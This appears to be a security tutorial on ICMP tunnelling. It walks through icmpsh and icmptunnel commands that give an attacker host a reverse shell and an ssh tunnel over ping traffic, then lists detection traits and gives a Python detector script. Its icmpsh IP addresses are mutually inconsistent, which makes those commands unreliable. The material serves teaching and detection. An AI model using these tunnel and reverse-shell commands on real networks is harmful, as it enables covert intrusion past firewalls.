ICMP tunnel traffic characteristics


ICMP protocol

Introduction to the ICMP protocol

ICMP is the abbreviation for 'Internet Control Message Protocol'. It is a sub-protocol of the TCP/IP suite, used to transmit control messages between IP hosts and routers. Control messages are messages about the network itself, such as whether the network is reachable, whether a host is reachable, and whether a route is available.

ICMP tunnel traffic characteristics

Normal ICMP traffic

[Screenshot: packet capture of normal ICMP traffic]

ICMP tunnel tools

In network environments where ping to remote hosts is permitted, attackers may use that permission to establish an ICMP tunnel: TCP/UDP data is encapsulated inside ICMP ping packets, passes through the firewall as ordinary echo traffic, and gives the attacker unrestricted network access.

Typical tools:

icmpsh

powershell icmp

icmptunnel

ptunnel

ICMP tunnel tool - icmpsh

icmpsh is a simple, cross-platform tool that does not require administrator privileges to run.

icmpsh download address:

https://github.com/inquisb/icmpsh

Environment:

Attacker/C2 channel: 192.168.159.185 (Kali Linux)

Host machine: 192.168.159.158 (Windows 7)

Run icmpsh in master mode (Kali Linux)

Disable kernel ping replies first, so that the kernel does not answer the echo requests itself and icmpsh alone controls the replies:

sysctl -w net.ipv4.icmp_echo_ignore_all=1

./icmpsh_m.py 192.168.1.185 192.168.1.158

Then execute the command on Win7:

icmpsh.exe -t 192.168.217.185

A reverse shell is successfully received on Kali.

[Screenshot: shell session received on Kali]

ICMP tunnel tool - icmptunnel

icmptunnel is a tunnel tool that encapsulates IP traffic inside ICMP echo request and echo reply (ping) packets. It provides a semi-covert channel in networks that allow ping and a way around firewalls that do not inspect ICMP payloads.

Download address:

https://github.com/jamesbarlow/icmptunnel

Attacker: 192.168.159.169

Target machine: 192.168.159.184

On both the attacker and the target machine, execute:

echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all # Disable icmp reply

The attacker executes:

./icmptunnel -s    # Listen as the tunnel server

Open a new command line window

ifconfig tun0 10.0.0.1 netmask 255.255.255.0        # Add tun0 network interface, assign tunnel address 10.0.0.1/24

[Screenshot: attacker-side icmptunnel server and tun0 setup]

The target machine executes:

./icmptunnel 192.168.159.169    # Connect to the server

Open a new command line window

ifconfig tun0 10.0.0.2 netmask 255.255.255.0        # Add tun0 network interface, assign tunnel address 10.0.0.2/24

[Screenshot: target-side icmptunnel client and tun0 setup]

Establish an ssh connection from the attacker machine through the tunnel address:

ssh root@10.0.0.2

[Screenshot: ssh session established over the ICMP tunnel]

Successful connection.

ICMP tunnel traffic characteristics

The ICMP session contains an unusually large number of packets (a normal ping exchange is only a few request/reply pairs).

[Screenshot: ICMP session with a large packet count]

A single tunnel packet carries a large amount of data (a normal ping payload is only a few dozen bytes).

[Screenshot: single ICMP packet carrying a large payload]

The echo request and the corresponding echo reply do not match. A normal reply returns the request's data unchanged, whereas a tunnel carries different data in each direction.

[Screenshots: echo request and echo reply with differing payloads]

Some tunnel tools leave a visible "tun" flag in the packet.

[Screenshot: "tun" flag visible in the captured packet]
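To turn these characteristics into a check, the following is an added example (not code from the original article or from any of the tools above) that parses raw ICMP echo packets and flags a conversation on the first three indicators: packet count, payload size, and request/reply payload mismatch. The thresholds, the field names and the sample capture are assumptions constructed for the example.

```python
import struct
from collections import defaultdict

MAX_NORMAL_PAYLOAD = 64    # assumed threshold: Linux ping sends 56 data bytes, Windows 32
MAX_NORMAL_PACKETS = 100   # assumed threshold: echo packets per (src, dst, id) conversation

def parse_icmp(raw):
    """Split an ICMP echo packet into type, code, id, seq and payload."""
    typ, code, _csum, ident, seq = struct.unpack("!BBHHH", raw[:8])
    return {"type": typ, "code": code, "id": ident, "seq": seq, "payload": raw[8:]}

def build_echo(typ, ident, seq, payload):
    """Constructed test input: ICMP echo header (checksum left at zero) + data."""
    return struct.pack("!BBHHH", typ, 0, 0, ident, seq) + payload

def analyze(packets):
    """packets: iterable of (src, dst, raw_icmp). Returns {conversation: [flags]}."""
    conv = defaultdict(lambda: {"count": 0, "big": 0, "req": {}, "mismatch": 0})
    for src, dst, raw in packets:
        p = parse_icmp(raw)
        if p["type"] not in (0, 8):          # only echo reply (0) / request (8)
            continue
        # Key request and reply of one conversation the same way (client first).
        key = (src, dst, p["id"]) if p["type"] == 8 else (dst, src, p["id"])
        s = conv[key]
        s["count"] += 1
        s["big"] += len(p["payload"]) > MAX_NORMAL_PAYLOAD
        if p["type"] == 8:
            s["req"][p["seq"]] = p["payload"]
        # RFC 792: a reply returns the request data unchanged; a tunnel does not.
        elif p["seq"] in s["req"] and s["req"][p["seq"]] != p["payload"]:
            s["mismatch"] += 1
    findings = {}
    for key, s in conv.items():
        flags = [name for cond, name in (
            (s["count"] > MAX_NORMAL_PACKETS, "high_packet_count"),
            (s["big"] > 0, "oversized_payload"),
            (s["mismatch"] > 0, "reply_payload_mismatch")) if cond]
        if flags:
            findings[key] = flags
    return findings

def sample_packets():
    """Constructed capture: one normal 56-byte ping and one tunnel-like session."""
    pkts = [("10.0.0.5", "10.0.0.1", build_echo(8, 0x1234, 1, bytes(range(56)))),
            ("10.0.0.1", "10.0.0.5", build_echo(0, 0x1234, 1, bytes(range(56))))]
    for seq in range(150):     # 300 packets with 512-byte, non-matching payloads
        pkts.append(("192.168.159.158", "192.168.159.185", build_echo(8, 0xBEEF, seq, b"A" * 512)))
        pkts.append(("192.168.159.185", "192.168.159.158", build_echo(0, 0xBEEF, seq, b"B" * 512)))
    return pkts
```

Feeding real traffic in requires only stripping the IP header from each captured packet and passing the ICMP bytes with their addresses; the "tun" flag from the last characteristic is tool-specific and is not modelled here.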
